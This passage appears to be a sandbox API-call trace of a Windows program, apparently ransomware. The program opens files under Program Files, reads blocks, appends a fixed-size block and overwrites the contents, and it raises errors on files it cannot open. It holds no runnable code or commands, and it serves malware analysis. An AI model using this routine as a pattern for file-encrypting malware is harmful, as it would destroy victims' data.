lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0065.444] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.444] ReleaseMutex (hMutex=0x168) returned 1 [0065.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Desert.jpg", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0065.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Desert.jpg", cchWideChar=10, lpMultiByteStr=0x1f7320c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Desert.jpg", lpUsedDefaultChar=0x0) returned 10 [0065.444] ReadFile (in: hFile=0x1e4, lpBuffer=0x28930e8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x28930e8*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.446] ReadFile (in: hFile=0x1e4, lpBuffer=0x28930e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x28930e8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.448] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xcd875 [0065.448] ReadFile (in: hFile=0x1e4, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.450] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xcd875 [0065.451] WriteFile (in: hFile=0x1e4, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0065.451] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0065.451] WriteFile (in: hFile=0x1e4, lpBuffer=0x28930e8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x28930e8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0065.452] WriteFile (in: hFile=0x1e4, lpBuffer=0x28930e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x28930e8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0065.452] CloseHandle (hObject=0x1e4) returned 1 [0065.709] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0065.738] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0065.738] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x4360 [0065.738] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0065.738] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.738] ReleaseMutex (hMutex=0x168) returned 1 [0065.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="as80.xsl", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0065.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="as80.xsl", cchWideChar=8, lpMultiByteStr=0x1f7358c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="as80.xsl", lpUsedDefaultChar=0x0) returned 8 [0065.739] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.752] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x3360 [0065.752] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.754] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x3360 [0065.755] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0065.755] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0065.755] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0065.755] CloseHandle (hObject=0x1cc) returned 1 [0065.764] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msmdsrv.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0065.766] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0065.766] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xa2b58 [0065.766] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0065.766] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.766] ReleaseMutex (hMutex=0x168) returned 1 [0065.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msmdsrv.rll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0065.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msmdsrv.rll", cchWideChar=11, lpMultiByteStr=0x1f7340c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msmdsrv.rll", lpUsedDefaultChar=0x0) returned 11 [0065.766] ReadFile (in: hFile=0x1cc, lpBuffer=0x2874088, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.775] ReadFile (in: hFile=0x1cc, lpBuffer=0x2874088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.778] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xa1b58 [0065.778] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.786] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xa1b58 [0065.786] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0065.787] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0065.787] WriteFile (in: hFile=0x1cc, lpBuffer=0x2874088*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0065.787] WriteFile (in: hFile=0x1cc, lpBuffer=0x2874088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0065.788] CloseHandle (hObject=0x1cc) returned 1 [0065.801] CreateFileW (lpFileName="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.Targets" (normalized: "c:\\program files\\msbuild\\microsoft\\windows workflow foundation\\v3.0\\workflow.targets"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0065.802] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0065.803] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1276 [0065.803] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0065.803] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.803] ReleaseMutex (hMutex=0x168) returned 1 [0065.803] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Workflow.Targets", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0065.803] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Workflow.Targets", cchWideChar=16, lpMultiByteStr=0x1f88ba4, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Workflow.Targets", lpUsedDefaultChar=0x0) returned 16 [0065.803] ReadFile (in: hFile=0x1cc, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1276, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2e9f2bc*=0x1276, lpOverlapped=0x0) returned 1 [0065.805] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0065.805] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x17fe, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2e9f2d0*=0x17fe, lpOverlapped=0x0) returned 1 [0065.805] CloseHandle (hObject=0x1cc) returned 1 [0065.808] CreateFileW (lpFileName="C:\\Program Files\\Windows Journal\\en-US\\Journal.exe.mui" (normalized: "c:\\program files\\windows journal\\en-us\\journal.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.077] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\en-US\\Journal.exe.mui", nBufferLength=0x104, lpBuffer=0x2e9f694, lpFilePart=0x2e9f690 | out: lpBuffer="C:\\Program Files\\Windows Journal\\en-US\\Journal.exe.mui", lpFilePart=0x2e9f690*="Journal.exe.mui") returned 0x36 [0066.077] GetLastError () returned 0x5 [0066.082] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2e9f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˩폈H˩퐔H˩L˩꧀Ƿ\x01") returned 0x13 [0066.179] LocalFree (hMem=0x69e2b0) returned 0x0 [0066.179] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2e9d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0066.179] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2e9f894) [0066.180] RtlUnwind (TargetFrame=0x2e9f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0066.180] RtlUnwind (TargetFrame=0x2e9f920, TargetIp=0x407184, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0066.180] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Journal\\en-US\\Journal.exe.mui" (normalized: "c:\\program files\\windows journal\\en-us\\journal.exe.mui")) returned 0x20 [0066.503] CreateFileW (lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp" (normalized: "c:\\program files\\windows journal\\templates\\genko_1.jtp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.926] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp", nBufferLength=0x104, lpBuffer=0x2e9f694, lpFilePart=0x2e9f690 | out: lpBuffer="C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp", lpFilePart=0x2e9f690*="Genko_1.jtp") returned 0x36 [0066.928] GetLastError () returned 0x5 [0066.928] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2e9f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˩폈H˩퐔H˩L˩꧀Ƿ\x01") returned 0x13 [0066.928] LocalFree (hMem=0x69e2b0) returned 0x0 [0066.928] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2e9d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0066.928] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2e9f894) [0066.928] RtlUnwind (TargetFrame=0x2e9f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0066.929] RtlUnwind (TargetFrame=0x2e9f920, TargetIp=0x407184, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0066.929] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp" (normalized: "c:\\program files\\windows journal\\templates\\genko_1.jtp")) returned 0x20 [0066.929] CreateFileW (lpFileName="C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp" (normalized: "c:\\program files\\windows journal\\templates\\to_do_list.jtp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.678] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp", nBufferLength=0x104, lpBuffer=0x2e9f694, lpFilePart=0x2e9f690 | out: lpBuffer="C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp", lpFilePart=0x2e9f690*="To_Do_List.jtp") returned 0x39 [0067.678] GetLastError () returned 0x5 [0067.678] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2e9f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˩폈H˩퐔H˩L˩꧀Ƿ\x01") returned 0x13 [0067.679] LocalFree (hMem=0x69e2b0) returned 0x0 [0067.679] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2e9d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0067.679] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2e9f894) [0067.679] RtlUnwind (TargetFrame=0x2e9f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0067.679] RtlUnwind (TargetFrame=0x2e9f920, TargetIp=0x407184, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0067.679] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp" (normalized: "c:\\program files\\windows journal\\templates\\to_do_list.jtp")) returned 0x20 [0067.680] CreateFileW (lpFileName="C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui" (normalized: "c:\\program files\\windows photo viewer\\en-us\\imagingdevices.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.680] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui", nBufferLength=0x104, lpBuffer=0x2e9f694, lpFilePart=0x2e9f690 | out: lpBuffer="C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui", lpFilePart=0x2e9f690*="ImagingDevices.exe.mui") returned 0x42 [0067.680] GetLastError () returned 0x5 [0067.680] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2e9f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˩폈H˩퐔H˩L˩꧀Ƿ\x01") returned 0x13 [0067.680] LocalFree (hMem=0x69e2b0) returned 0x0 [0067.680] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2e9d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0067.680] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2e9f894) [0067.680] RtlUnwind (TargetFrame=0x2e9f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0067.680] RtlUnwind (TargetFrame=0x2e9f920, TargetIp=0x407184, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0067.680] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui" (normalized: "c:\\program files\\windows photo viewer\\en-us\\imagingdevices.exe.mui")) returned 0x20 [0067.681] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\centralcreditcard.exe" (normalized: "c:\\program files (x86)\\adobe\\centralcreditcard.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.681] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\centralcreditcard.exe", nBufferLength=0x104, lpBuffer=0x2e9f694, lpFilePart=0x2e9f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\centralcreditcard.exe", lpFilePart=0x2e9f690*="centralcreditcard.exe") returned 0x32 [0067.681] GetLastError () returned 0x20 [0067.681] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x2e9f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="洀i˩폈H˩퐔H˩L˩꧀Ƿ\x01") returned 0x51 [0067.681] LocalFree (hMem=0x696d00) returned 0x0 [0067.681] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2e9d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0067.681] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2e9f894) [0067.682] RtlUnwind (TargetFrame=0x2e9f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0067.682] RtlUnwind (TargetFrame=0x2e9f920, TargetIp=0x407184, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0067.682] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\centralcreditcard.exe" (normalized: "c:\\program files (x86)\\adobe\\centralcreditcard.exe")) returned 0x20 [0067.682] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\liesmich.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0068.370] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0068.370] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x42b6 [0068.370] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0068.371] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0068.371] ReleaseMutex (hMutex=0x168) returned 1 [0068.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Liesmich.htm", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0068.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Liesmich.htm", cchWideChar=12, lpMultiByteStr=0x1f7340c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Liesmich.htm", lpUsedDefaultChar=0x0) returned 12 [0068.371] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0068.396] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x32b6 [0068.396] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0068.397] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x32b6 [0068.398] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea9ab8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0068.398] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0068.398] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0068.398] CloseHandle (hObject=0x1cc) returned 1 [0068.409] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Adobe.Reader.Dependencies.manifest" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\adobe.reader.dependencies.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0068.410] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0068.410] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x5c0 [0068.410] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0068.410] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0068.410] ReleaseMutex (hMutex=0x168) returned 1 [0068.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Adobe.Reader.Dependencies.manifest", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0068.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Adobe.Reader.Dependencies.manifest", cchWideChar=34, lpMultiByteStr=0x1fa55f4, cbMultiByte=34, 